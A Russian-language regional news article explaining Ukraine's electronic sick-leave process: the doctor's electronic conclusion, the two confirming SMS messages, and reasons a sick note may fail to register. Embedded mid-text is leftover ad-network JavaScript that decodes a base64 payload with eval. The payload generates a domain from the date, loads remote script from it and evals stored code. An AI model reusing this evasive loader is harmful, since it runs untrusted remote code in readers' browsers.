Что изменилось при оформлении больничного, почему больше не нужно собирать подписи и штампы и бланках и которые и от кого смс-сообщения необходимо получить при оформлении временной нетрудоспособности — ответы на эти и другие вопросы, о которых важно знать всем — рассказывает Акцент со ссылкой на материал Минздрава,
Как выглядит оформления электронного больничного?
Теперь никаких бланков, где указано чем вы болели! Если вы заболели, прежде всего нужно обратиться к врачу, который проведет медицинский осмотр и назначит лечение. Если окажется, что в связи с состоянием здоровья вам нужно «уйти на больничный», врач создаст электронный медицинское заключение о временной нетрудоспособности. Этот электронный документ подтверждает вашу нетрудоспособность в течение прогнозируемого периода. И на основании медицинского заключения о временной нетрудоспособности (далее — МВТН) будет сформирован ваш электронный больничный в Электронном реестре листков нетрудоспособности. В личном кабинете на портале Пенсионного фонда вы можете просмотреть ваши листки нетрудоспособности.
На что стоит обратить внимание у врача, когда «идешь на больничный»?
При создании врачом МВТНа пациентам рекомендуется проверить корректность введенной врачом информации. А еще важно получить смс-сообщение от электронной системы здравоохранения. Если не получили — проверьте актуальность внесенного в систему номера телефона. Полученное сообщение будет содержать 16 значный номер МВНТ и подтверждает, что он был создан именно вам.
Как вы узнаете, что е-больничный оформлен успешно?
Фактом подтверждения успешного формирования электронного больничного является получение второго смс-сообщение, на этот раз — от Пенсионного фонда Украины. Его вы получите если зарегистрировались на портале пенсионного фонда и там отметили именно этот способ коммуникации. Важно понимать, что успешность формирования именно электронного больничного зависит от наличия ваших данных в Реестре застрахованных лиц. Их должно подать ваш работодатель. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
В каких случаях Вам могут не прийти 2 смс-сообщения?
От электронной системы здравоохранения не придет смс-сообщение если:
в системе неактуален номер телефона, вы не выбрали этот способ коммуникации, у вас изменились персональные данные (например, номер паспорта), а вы не сообщили об этом врачу, если МВТН был ошибочно создан не вам.
От пенсионного фонда не придет смс-сообщение если:
вы не зарегистрировались в личном кабинете на портале Пенсионного фонда и не выбрали этот способ коммуникации, в личном кабинете неактуален номер телефона, вы официально не трудоустроены и в реестре отсутствуют данные об уплате ЕСВ, вы не являетесь застрахованным лицом и ваши данные отсутствуют в Реестре застрахованных лиц, ваш работодатель не подал ваши данные для внесения в РЗО.
Если электронный больничный не был сформирован, в таком случае вам следует спросить у врача, поступала ответ от электронного реестра листков нетрудоспособности. Если будет установлено, что «запись не найдена», а пациент является застрахованным лицом необходимо обратиться к работодателю или на горячую линию Пенсионного фонда Украины — телефон 0800503753. (adsbygoogle = window.adsbygoogle || []).push({});
Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/v-moz-razyasnili-vazhnye-osobennosti-elektronnyh-bolnichnyh/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook